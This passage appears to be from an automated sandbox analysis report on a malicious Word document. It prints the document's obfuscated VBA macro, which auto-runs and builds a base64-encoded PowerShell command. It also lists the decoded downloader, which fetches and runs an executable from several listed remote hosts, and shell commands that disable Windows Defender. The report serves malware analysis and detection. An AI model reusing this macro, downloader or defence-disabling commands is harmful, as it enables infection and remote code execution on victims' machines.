h2_6__2 = Sgn(218451122)
n8101_ = v385_8
End Select
Select Case a__3_57
Case 367380075
P_564_4 = H7897226
z_4__2 = Sgn(245533395 * Rnd(473844747))
H_3_3_ = ChrB(839971224)
n__16431 = C__34_9
S5_56_ = Sgn(621725025)
k6_54_ = L____2
End Select
Select Case o285__
Case 923585608
B4290__ = i_2721
Y_656___ = Sgn(198642324 * Rnd(610065653))
C_18_9 = ChrB(587054957)
v_4786_3 = X__411
U5_74_1 = Sgn(59324191)
i7970591 = s7_8_0_5
End Select
Y4___00_ = "QA" + "cAAnACsAJwA6AC8" + "A" + "LwAyACc" + "AKwAnAD" + "IAMgAuAD" + "E"
Select Case u5_050
Case 632095148
n6___0 = C9_604
T38__0_ = Sgn(798710365 * Rnd(51267130))
A2_247 = ChrB(270349113)
N1542_6 = s4252_
d227__ = Sgn(25927938)
A477_6__ = t4_34_
End Select
Select Case m5__52
Case 257530804
w560_7 = z___7__
v8_768_5 = Sgn(656788483 * Rnd(389307982))
u_2943_ = ChrB(217478539)
k__8_4 = c_594_
j_064222 = Sgn(94923070)
N40_6___ = r_8_5__
End Select
O688290_ = "AMAA2ACc" + "AKwA" + "nAC4AMgAn" + "ACs" + "AJ" + "wAxACcAKwAnAD" + "cALgAzAC" + "cAKwAnAD"
Select Case j_156_42
Case 875806043
S_6_3__5 = U_4796_6
n50_4_ = Sgn(354606498 * Rnd(810326007))
H837276 = ChrB(129212639)
F2_34_ = r79___21
m38_329 = Sgn(880651759)
S2_9103_ = d438_0_
End Select
Select Case Y_8___
Case 130741621
T87129 = S__7_0
o__1_647 = Sgn(153704841 * Rnd(858862313))
z55_3_66 = ChrB(395107766)
i_4_31__ = z144_915
M15118_4 = Sgn(57229665)
U9_538 = V73511
End Select
a362668 = "cALwAnACsAJwB" + "3AG8AJwArA" + "CcAcgAnACsAJwB" + "kAHAAc" + "gBlAHMAJwArACc"
Select Case K139__2
Case 353584548
r4__0_4 = W_81___
T541_42_ = Sgn(241559110 * Rnd(794768086))
I2_7_526 = ChrB(304998705)
X_79_18 = A3_32_
k_975_5 = Sgn(624213949)
k09706_ = W06__2
End Select
Select Case Y_7_856
Case 603750076
G_8834 = p6_8__
I__65_ = Sgn(821548879 * Rnd(988147176))
G_08_5 = ChrB(185301907)
W303_086 = z5_443__
Q185_29_ = Sgn(333125609)
Q2_4289 = s7_44_60
End Select
f__96_ = "AcwAvADMAS" + "QAnACsAJwAxA" + "GUANQAnACsAJwB" + "KAHgAJwApAC4AU" + "wBwAGwAaQB" + "0AC" + "gAJwBAACcAKQA7A"
Select Case N5_3813
Case 438592989
d2_7__ = a358345_
k43____ = Sgn(951100819 * Rnd(825219723))
R_85__9 = ChrB(592229420)
R342_2 = d_8___
u4_7__04 = Sgn(181571972)
K76_7_56 = c__4_482
End Select
Select Case V51___93
Case 636165435
S_502__9 = S8__179
r3_20980 = Sgn(356827411 * Rnd(625499362))
T2148321 = ChrB(140017620)
L61_1__ = M_9_90
f48_19 = Sgn(994512315)
Z948_97_ = d_8_7280
End Select
j_717_ = "CQA" + "RQBfAF8AMQA4" + "ADY" + "ANwA9ACgAJwB" + "j" + "AF8A" + "JwArAC"
Select Case Y___771
Case 834370494
t739522 = I_39_3_
T_6_8212 = Sgn(927885648 * Rnd(630689895))
P6165_2 = ChrB(276275037)
b_0_756 = m367_41
Z4371_ = Sgn(872689478)
K960_4 = V3____
End Select
Select Case v2_4947_
Case 682725460
J9__1341 = i_269568
v__192 = Sgn(453825411 * Rnd(350542821))
o_452808 = ChrB(636716673)
c2_52__ = E33__5__
k_371___ = Sgn(249468704)
q___6___ = f5__0_7
End Select
Select Case T____8
Case 642175362
j72__0_ = h1_41_
c763_8_ = Sgn(191916974 * Rnd(280012174))
h_10_06 = ChrB(448941777)
O_6__0_ = p_35_4
v_708_8 = Sgn(26861080)
V_9_7_2 = B3__193_
End Select
n30_76__ = "cAXwBfADQANw" + "AnACkA" + "OwAkAG0" + "ANABfAF8ANQBfAD" + "IAMAAgAD0AIAA" + "nADQA" + "Ng" + "AnADsA" + "JABoADEA"
X_44_8_3 = Y4___00_ + O688290_ + a362668 + f__96_ + j_717_ + n30_76__
End Function
Function u9_445()
On Error Resume Next
Select Case G124__
Case 27386549
w348_542 = G_888_
T_4599 = Sgn(913495504 * Rnd(380268001))
G77784 = ChrB(607464531)
P2___56 = h897__
b00_08 = Sgn(516168146)
z__64_08 = a_8144
End Select
Select Case F7788__
Case 723628054
M8330_ = X574_8
l93___7_ = Sgn(186964607 * Rnd(932739657))
p4_8__0 = ChrB(705088891)
z4223_ = b__8_695
B4____5 = Sgn(242916094)
W2_2170_ = Z7_573_5
End Select
Select Case h_50__43
Case 625654110
S_3__2_ = O0__0028
U5_0__70 = Sgn(405800867 * Rnd(463769878))
P__970__ = ChrB(97251838)
k8_37_ = k40_675
R781_56_ = Sgn(979144594)
Z93_71 = q__05_
End Select
O833427 = "NQA1ADcANAA9A" + "C" + "gAJwB" + "xADQAJwAr" + "AC"
Select Case H9_897_
Case 106301400
w59_1_ = f02012_
J7_9_80_ = Sgn(41497708 * Rnd(810285332))
a4____5_ = ChrB(312723799)
r890699_ = m9_882_
A12_274_ = Sgn(45259228)
F7_9115 = X8105_
End Select
Select Case z7____
Case 5986737
l6939_46 = G_03__76
f807__ = Sgn(991162966 * Rnd(238953199))
a_8_865 = ChrB(915105660)
q545_6 = t2502_
l25___ = Sgn(101531725)
W6_078 = i4556_87
End Select
Select Case t3_0833
Case 971341483
O__5845 = U424_4_
O____4 = Sgn(512348709 * Rnd(828811200))
M4____ = ChrB(490419632)
r_3___ = n_47_9
j05_8_08 = Sgn(828519)
k7353_ = i3_13___
End Select
W_8_95 = "cANAA0" + "ADAAXw" + "AnACkAOw" + "AkAEoAMA" + "A2AF8ANgA4AD" + "QAXwA9ACQAZQB" + "uAH" + "YAOgB1" + "A"
Select Case P5362___
Case 320329323
J744_48 = P29__11
V_9_____ = Sgn(356582891 * Rnd(53854486))
u10__9 = ChrB(458455572)
S__694 = Z1_42_
Z0444_80 = Sgn(348031160)
u_289_ = F_65_3
End Select
Select Case a964__3
Case 610495828
w8_6994 = Z11_057
K___714_ = Sgn(239625427 * Rnd(667144816))
l_91_1 = ChrB(7298240)
i6__1670 = b477_831
i5903_ = Sgn(100805209)
n575_08_ = i_58_2_
End Select
b__4335 = "HM" + "AZQByAHAAcgB" + "vAGYA" + "aQBsAGUAK" + "wAnAFwAJwArAC" + "QAbQA0AF8AXw" + "A1"
Select Case w_5__23
Case 35697463
Y9___405 = s40876_0
m_812_1_ = Sgn(229488272 * Rnd(700557182))
t___6_ = ChrB(496681032)
j_88_2_8 = a_6_01
z3_1_406 = Sgn(664414312)
w13_112 = S_44_82
End Select
Select Case o6__35_5
Case 878654972
W_167_8_ = b10_0861
w___56_ = Sgn(659270996 * Rnd(290540838))
H6156_5_ = ChrB(479187005)
H4453_ = f5_6_923
B_8__6 = Sgn(684106954)
N91292_ = d14_38_
End Select
R_9484_0 = "AF8AMgAwACsAK" + "AAn" + "AC4AZQAnACsAJw" + "B4AGUAJ" + "wApADsAZgBv" + "AH" + "IAZQBh" + "AGMAaAAoACQ"
Select Case B5609_6
Case 76509040
f37__4 = I6_329__
z69___ = Sgn(656981968 * Rnd(134204220))
Q_8__94 = ChrB(358302158)
X46_840 = q_9_22
p583900 = Sgn(431628028)
D6958___ = s5_5__
End Select
Select Case b_21_6_
Case 671343453
Y7_6__5 = T1_0643_
u_58_7 = Sgn(606141508 * Rnd(827750329))
z191954 = ChrB(540589456)
R1___0_ = q_768593
z33_3_58 = Sgn(687074110)
w08___ = h59728_
End Select
Select Case V__185
Case 298806667
X_3__07 = j3___8
z3558_ = Sgn(484072484 * Rnd(652484405))
r7_84__0 = ChrB(707720827)
Z__77_1 = M5_6630
v_15_979 = Sgn(93437468)
t2_00747 = K72_78
End Select
E5___1 = "A" + "VQ" + "BfADgANgAxAD" + "YAOQ" + "AgAG" + "kA"
Select Case W_1_29
Case 147028075
t21__2 = j72_399
h7_717_ = Sgn(474890797 * Rnd(406103798))
G135__40 = ChrB(445699400)
Q00511 = Q708__
q_555385 = Sgn(675043956)
P45___82 = o6_32958
End Select
Select Case Z34__570
Case 659575401
Y0__803 = J3118__6
w__7_10 = Sgn(496589742 * Rnd(806746144))
i_754972 = ChrB(929288914)
p_062431 = v108_3
t36__980 = Sgn(686625456)
P4_812 = T_65_7__
End Select
d27_27_ = "bgAgACQAYwBfAD" + "AAXwA1" + "AF8AXwBfAC" + "kAewB0AHIAeQB7" + "ACQARwA2AF8AX" + "wAxADE" + "ANwA5AC4AR"
Select Case K716627
Case 687555312
c_595_ = u_1_44
p1_4__0 = Sgn(417594379 * Rnd(986748095))
L_3761_7 = ChrB(928959089)
v_76849 = r7_56_
r3_9034 = Sgn(312809300)
j_5___7 = q746__8_
End Select
Select Case o8_1_1
Case 131956379
p_9_51_4 = S49035
d724_8 = Sgn(5247484 * Rnd(174077889))
I_9_7_ = ChrB(565080242)
J3822__8 = t____9
c_2_2_7 = Sgn(98762337)
h_9107_ = R164_1
End Select
Select Case u97024_
Case 98388928
H_910__ = F_845523
S13_82_ = Sgn(715308542 * Rnd(19498421))
F843_178 = ChrB(426131223)
V7997536 = s9361_
m30__184 = Sgn(106230514)
i_0170 = z_99_8_
End Select
W__3671 = "ABvA" + "HcAb" + "gBsAG8" + "AYQB" + "kAEYAa" + "QBsAGU" + "AKAAkA" + "FUA"
Select Case k_95_28_
Case 568924858
B441_59 = i31_55
q4933_78 = Sgn(678280813 * Rnd(866949161))
P_2_747_ = ChrB(614464565)
Q9448_0_ = b_6_3_7_
W511_2 = Sgn(344402452)
s96364 = d__1_01_
End Select
Select Case s10__8_5
Case 994613103
i8_3080 = W47___
b80__43 = Sgn(950061164 * Rnd(53857371))
n___1_ = ChrB(275562493)
M8896980 = C__4_89
Q949_881 = Sgn(675801366)
G72_41_ = N_96603
End Select
Select Case u5__53_9
Case 648578148
F93_03 = h577____
E_78_2 = Sgn(534129781 * Rnd(73914012))
C6_767 = ChrB(760300318)
I72419 = s226877
s901386 = Sgn(404819521)
d127_6 = j_86_6
End Select
L6_12071 = "XwA4ADYA" + "MQA2ADkALAAg" + "ACQA" + "SgAwADYAXw" + "A2ADgAN" + "A" + "BfACkAOwAkAGwA" + "OAA1AF8"
Select Case V_85352
Case 508751685
L96112 = V6_16_8
X_93939_ = Sgn(176542412 * Rnd(212870238))
B11753 = ChrB(710616765)
M28178 = d0__0__
i7_4__ = Sgn(49284538)
R_92__7 = k22200
End Select
Select Case G__5_9_
Case 226267602
Z4_6320 = k_9604
s_1_8_ = Sgn(751074561 * Rnd(355716227))
f16__0 = ChrB(801350223)
T_4840 = h98321
S1816_ = Sgn(15942749)
C_01__ = C7806_4
End Select
k4765_3 = "AX" + "wBfAD0" + "AKAA" + "n" + "AGgAJwArACcAX" + "wBfACcAK"
u9_445 = O833427 + W_8_95 + b__4335 + R_9484_0 + E5___1 + d27_27_ + W__3671 + L6_12071 + k4765_3
End Function
Function H_6377()
On Error Resume Next
Select Case D223__8_
Case 540543047
h81595_ = o_8_32
O_54__09 = Sgn(933952886 * Rnd(351938889))
j_2_04__ = ChrB(866269953)
G21160 = s1_89_
p6_0_868 = Sgn(950977850)
D_5____3 = j4_868_
End Select
Select Case P_1__7_5
Case 623954175
a_16___1 = X37_64__
w1699_9 = Sgn(546877168 * Rnd(121869519))
d_9_6916 = ChrB(952066887)
n1__930 = f101877_
H_8__3 = Sgn(890518048)
j_50_746 = V7__9495
End Select
Select Case h___41__
Case 475981781
n_2_8__8 = p2872_
h__6____ = Sgn(315012309 * Rnd(694319426))
Y_960_6 = ChrB(135668765)
P_____55 = m2_8_7
L073__ = Sgn(815164642)
E_472__ = d53_91
End Select
F48_9953 = "wAnAF8AMAAz" + "A" + "CcAKQA7AEkAZgA" + "gA" + "CgAKABHAGUAdAA" + "tAEk"
Select Case Q5015775
Case 683139481
z0_7_040 = V_325_
O90307 = Sgn(12679661 * Rnd(650048021))
a_55__7 = ChrB(661830346)
X13_87_ = v_9057_
C6745_37 = Sgn(936842637)
P_005947 = H87477_
End Select
Select Case G89_20
Case 577646355
m4_0___ = I_835_
T_1_54__ = Sgn(238059446 * Rnd(990151954))
w2_39__ = ChrB(744893791)
E_6____ = h14504
z2_0___ = Sgn(105653680)
Q95336 = O005_45_
End Select
Select Case X__33_
Case 919269643
i8_73524 = L80532_
O7_9200 = Sgn(324858534 * Rnd(826894668))
j38_13 = ChrB(169602850)
o_9_29 = V_233946
d_9_553_ = Sgn(76216091)
N__5_97_ = c2____1
End Select
q3__9_0_ = "AdABlAG" + "0AIAAkAEoA" + "MAA2AF8ANg" + "A" + "4ADQAX"
Select Case u_53021
Case 701528473
R611___4 = T6388_7
w843__7_ = Sgn(884098844 * Rnd(813071956))
M_278965 = ChrB(958063069)
n_280_0_ = z482433
q7__2_ = Sgn(102904762)
F22___ = n5__4_2
End Select
Select Case j7_7890_
Case 244023529
i11_2_ = j62406
A93__1 = Sgn(653047315 * Rnd(83429258))
W87_056_ = ChrB(820114014)
o__4_8 = M514804
X06_85 = Sgn(284585198)
l____82_ = U__9382
End Select
v56424 = "wApAC4A" + "bABlAG4AZ" + "wB0AGgAIAAtAGcA" + "ZQAgADQA" + "MAAw" + "ADAAMA"
Select Case n0076529
Case 665850416
n70_164_ = o297801
K_1245 = Sgn(828158068 * Rnd(961299905))
j37030 = ChrB(425030551)
b2__24_8 = r_26714_
Y47_9_8 = Sgn(362079169)
r284_35 = u4___070
End Select
Select Case m_8399
Case 631001944
u5_244 = l8_5_7
Q8_705 = Sgn(863875676 * Rnd(603643217))
z__7349 = ChrB(211932568)
w268_9 = m__78341
f974904 = Sgn(376546373)
T__92_ = I80233
End Select
Select Case r94375
Case 108618248
S8_874_ = Z717_47_
J787_02 = Sgn(284256551 * Rnd(829694246))
Q__014__ = ChrB(785528832)
p11_26_ = b_032_21
w1_3391 = Sgn(779257407)
l3_0_0 = q8_7_63
End Select
i33__7_6 = "ApACAAewBJAG" + "4" + "AdgBvAGsA" + "ZQAtAEkA" + "dABlAG"
Select Case s4_2_6__
Case 321427021
k_9__69 = P9_07_7
X05_75 = Sgn(801466764 * Rnd(178986564))
Z3_5___8 = ChrB(888449253)
C__495 = j__9__
m45_05 = Sgn(785668490)
d5__08 = s7_6__
End Select
Select Case w31_70
Case 73062209
i6____ = b445323_
Q9_85589 = Sgn(433815055 * Rnd(456084190))
h_5___97 = ChrB(762986348)
d53___2_ = n_74320
d57_96_ = Sgn(427990269)
J02__44 = d_5055
End Select
Select Case l90___1_
Case 903597676
U7__7_42 = Z91__8
Y3_70_ = Sgn(735617150 * Rnd(692322526))
j2_97_ = ChrB(121742069)
h24_49_ = i__44_73
p___437_ = Sgn(200934049)
Q__22_ = X____1
End Select
W_90_7 = "0AIAAkAEo" + "AMAA2AF8AN" + "gA4ADQAXwA7AC" + "QA" + "SQAzADcANAAyAF8"
Select Case U8_851_
Case 144327982
U7__644 = w4_41_
w__337 = Sgn(194968358 * Rnd(464284295))
w5336_9 = ChrB(944581765)
b_1_41 = d5____
Z441_5_ = Sgn(732801666)
s____288 = n3_231
End Select
Select Case u53__2
Case 505902400
D_8646 = p7_3742_
j5____86 = Sgn(715628645 * Rnd(230281158))
f790__22 = ChrB(48645244)
B371_71 = X6__52
s_0071_ = Sgn(428901419)
P6_60___ = w0__245
End Select
Select Case I9__4746
Case 177099286
T9_6262 = Q647_181
k32_427 = Sgn(91884237 * Rnd(20302277))
i46__0_ = ChrB(551893212)
Z4_7_56 = v33056
c4_51_8 = Sgn(734858818)
c_7_8_43 = c7_11_
End Select
i18_135 = "AOAA9ACgAJwBMAD" + "kAMwAnACs" + "AJwBfACc" + "AKwAnADEA" + "XwBfAD" + "UAJwApADsAYgB"
Select Case u5_4_8_
Case 839653514
F98___3_ = O__078
h1__5_ = Sgn(60333977 * Rnd(623249135))
L_4_221 = ChrB(939411333)
b2_0_554 = r75_44
P_056_ = Sgn(471202879)
P9_08969 = S3_8_2
End Select
Select Case n3_1638_
Case 957259004
c4461_3 = U740_6
C65953 = Sgn(427303337 * Rnd(569214655))
b9_9_07_ = ChrB(788448490)
A__0_96 = H1_8_92
A__9_0 = Sgn(838854995)
a93_9581 = z80292_
End Select
Select Case O744_9
Case 920505206
X__3_1_ = b__621
k187197 = Sgn(44700719 * Rnd(811060850))
v4266960 = ChrB(708499022)
j49_6_6 = J_6___
T72____ = Sgn(42619304)
P__6_73 = u34___
End Select
Y8__6_04 = "yAGUAYQBrADs" + "AfQB9AGM" + "AYQB0" + "AGMAa" + "AB7AH" + "0AfQAkA" + "HcA" + "XwAzADMAXwA" + "zADQAPQAoACcAU"
H_6377 = F48_9953 + q3__9_0_ + v56424 + i33__7_6 + W_90_7 + i18_135 + Y8__6_04
End Function
Function k23_61()
On Error Resume Next
Select Case Y_69980_
Case 823952466
n_09_2 = r27_7494
H4__01 = Sgn(349362035 * Rnd(2408617))
W_95___ = ChrB(530016743)
N90_0_1_ = z4_8__
F94__95_ = Sgn(501506504)
j61_31 = B4__72_
End Select
Select Case b080_724
Case 747766088
B5__65_0 = A_40_1_
t_665_ = Sgn(56614930 * Rnd(763417543))
a___196_ = ChrB(485637188)
w6448_4 = V4_0__
d4598___ = Sgn(167392448)
D747__ = G2____4
End Select
Select Case O296_6__
Case 54552455
p_6____ = m169_274
m_2___0_ = Sgn(214965053 * Rnd(673014572))
r68__1 = ChrB(172691018)
n4_44_ = j__6379
k23_9797 = Sgn(193706673)
q3710_ = N071959
End Select
k__4252_ = "QA" + "yADA" + "AJwA" + "rACcAMAAxADAAMQ" + "AnACkAO" + "wA="
k23_61 = k__4252_
End Function
Sub autoopen()
On Error Resume Next
Select Case Y9_253
Case 158146800
J9___85 = R1_721
c_67_82 = Sgn(799582567 * Rnd(416445247))
K_21__13 = ChrB(378474722)
K0_3825 = w__9463
f28877 = Sgn(307285174)
v01__2 = m__11868
End Select
Select Case j569__6
Case 407331079
i465_3_ = a054__
h94943__ = Sgn(309241192 * Rnd(200170773))
G__643 = ChrB(85214618)
V__5941 = c_6___
X2907_ = Sgn(546547131)
j0_10_ = M_750__
End Select
Select Case D3_333
Case 169413072
n9289_16 = w_401__
b3___3_ = Sgn(145375852 * Rnd(494963676))
a_3741 = ChrB(426938067)
K20_76 = c_57_820
M6_9882_ = Sgn(20429938)
U_861778 = Y__909
End Select
H4__0_0 j_53353 + "powe" + o__4790 + J_535___ + v11782 + r___04_4 + A02_215_ + r_95_334 + X_44_8_3 + u9_445 + H_6377 + k23_61, T_4_0_ + h7__98 + a_3__3_ + N47___86
Select Case V6464_
Case 171428583
L60__1 = A__1544
s51_2_6 = Sgn(548057469 * Rnd(711138716))
q__71_92 = ChrB(829618536)
W907__52 = G_2_26
N3282_5 = Sgn(775550117)
j026_3_7 = n0407__
End Select
Select Case i52_9_62
Case 817173739
h484344 = T10__65
F93_24_ = Sgn(193228585 * Rnd(239188919))
N73___6_ = ChrB(636827458)
i2889_6_ = S__88_2
w_2_2__ = Sgn(606069728)
z8666_ = f_2_5_
End Select
Select Case G___6_
Case 448451882
p_15_850 = r183_1
b_0104 = Sgn(57150558 * Rnd(13380303))
Q21___ = ChrB(28906951)
d_5__04 = f_2_80__
K_4_926_ = Sgn(284196816)
h39_59 = k67627
End Select
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACBPIDS_S-1-5-5-0-63335"
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACB10_S-1-5-5-0-63335"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Local\x64_10MU_ACB10_S-1-5-5-0-63335"
"Local\ZonesCacheCounterMutex"
"Local\x64_10MU_ACBPIDS_S-1-5-5-0-63335"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Local\ZonesLockedCacheCounterMutex"
"Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~_c_message_859897272.doc" as clean (type is "data")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE14\RICHED20.DLL" at E5970000
- source
- Loaded Module
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Loads the .NET runtime environment
- details
-
"powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at E4090000
"powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\199dd46435d7fdbbe590cccd8c8ae9cb\mscorlib.ni.dll" at 70DB0000
"powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\199dd46435d7fdbbe590cccd8c8ae9cb\mscorlib.ni.dll" at 70DD0000 - source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "powershell.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, Path, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "powershell.exe" (Show Process) was launched with missing environment variables: "MEOW, PROCESSOR_ARCHITEW6432, PROMPT, VXDIR"
Process "46.exe" (Show Process) was launched with modified environment variables: "PSModulePath"
Process "46.exe" (Show Process) was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
Process "46.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "limewcs.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, LOCALAPPDATA, USERDOMAIN, PROCESSOR_ARCHITECTURE, PSModulePath, TEMP, APPDATA, USERPROFILE, TMP, ProgramFiles"
Process "limewcs.exe" (Show Process) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432, LOGONSERVER, HOMEPATH, HOMEDRIVE"
Process "limewcs.exe" (Show Process) was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
Process "limewcs.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "sc.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "ZPhQTlnvSsgt3fI129V.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "sc.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "svchost.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "powershell.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G"" - source
- Monitored Target
- relevance
- 10/10
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "-W+")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "=Y+")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "HU+")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Runs shell commands
- details
-
"/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" on 2019-2-25.20:40:43.969
"/c sc stop WinDefend" on 2019-2-25.20:40:46.133
"/c sc delete WinDefend" on 2019-2-25.20:40:46.148
"/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" on 2019-2-25.20:40:46.187
"/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" on 2019-2-25.20:41:28.633
"/c sc stop WinDefend" on 2019-2-25.20:41:30.703
"/c sc delete WinDefend" on 2019-2-25.20:41:30.719
"/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" on 2019-2-25.20:41:30.773 - source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1010 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
- Spawned process "powershell.exe" with commandline "poweRsHeLl -nop -e JABXADMAXwA1ADQANgAzAF8APQAoACcAaAA4ADYAXwAnA ..." (UID: 00010119-00003304, Additional Context: "$W3_5463_=('h86_'+'0242');$G6__1179=new-object Net.WebClient;$c_0_5___=('http://'+'35.1'+'84'+'.61.'+'2'+'54'+'/tg'+'9p'+'zdY@'+'htt'+'p:'+'//52'+'.'+'20'+'4.186.102/PASm'+'kvmb'+'@http://54.'+'17'+'2.8'+'5'+'.'+'22'+'1/T'+'i0'+'JeJu'+'9'+'@ht'+'tp://52.'+'70'+'.'+'23'+'9.229/b'+'log/wp-'+'c'+'onte'+'nt/uplo'+'ads/'+'PZ96X'+'ibEUU@http'+'://2'+'22.106'+'.2'+'1'+'7.3'+'7/'+'wo'+'r'+'dpres'+'s/3I'+'1e5'+'Jx').Split('@');$E__1867=('c_'+'__47');$m4__5_20 = '46';$h15574=('q4'+'440_');$J06_684_=$env:userprofile+'\'+$m4__5_20+('.e'+'xe');foreach($U_86169 in $c_0_5___){try{$G6__1179.DownloadFile($U_86169, $J06_684_);$l85___=('h'+'__'+'_03');If ((Get-Item $J06_684_).length -ge 40000) {Invoke-Item $J06_684_;$I3742_8=('L93'+'_'+'1__5');break;}}catch{}}$w_33_34=('Q20'+'0101');"), Spawned process "46.exe" (Show Process), Spawned process "46.exe" (Show Process), Spawned process "limewcs.exe" (Show Process), Spawned process "limewcs.exe" (Show Process), Spawned process "ZOhPSkmvRrgs3fH129U.exe" (Show Process), Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process), Spawned process "cmd.exe" with commandline "/c sc stop WinDefend" (Show Process), Spawned process "cmd.exe" with commandline "/c sc delete WinDefend" (Show Process), Spawned process "sc.exe" with commandline "sc stop WinDefend" (Show Process), Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process), Spawned process "ZPhQTlnvSsgt3fI129V.exe" (Show Process), Spawned process "sc.exe" with commandline "sc delete WinDefend" (Show Process), Spawned process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process), Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process), Spawned process "cmd.exe" with commandline "/c sc stop WinDefend" (Show Process), Spawned process "cmd.exe" with commandline "/c sc delete WinDefend" (Show Process), Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process), Spawned process "sc.exe" with commandline "sc delete WinDefend" (Show Process), Spawned process "sc.exe" with commandline "sc stop WinDefend" (Show Process)
- source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"ZPhQTlnvSsgt3fI129V.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"~_c_message_859897272.doc" has type "data"
"46.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"ZOhPSkmvRrgs3fH129U.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"Enc_message_859897272.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Mon Feb 25 19:33:16 2019 mtime=Mon Feb 25 19:33:16 2019 atime=Mon Feb 25 19:33:24 2019 length=192029 window=hide"
"78F892B4.w6687_" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 96x96 segment length 16 baseline precision 8 1409x624 frames 3"
"index.dat" has type "data"
"settings.ini" has type "FORTRAN program ASCII text with very long lines with CRLF line terminators"
"~WRS_E7EB73ED-EE40-4DBE-81AA-CD3F1390723D_.tmp" has type "data"
"613245a6258220a31eae4344732fc929_6b06490d-f9fd-424c-8b6d-83edc4369e89" has type "data"
"6QIW9QO31PIEZF62WBMQ.temp" has type "data"
"~WRS_4C6B9B43-EDD9-4FF0-BF0F-7997885F684E_.tmp" has type "data"
"~_Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
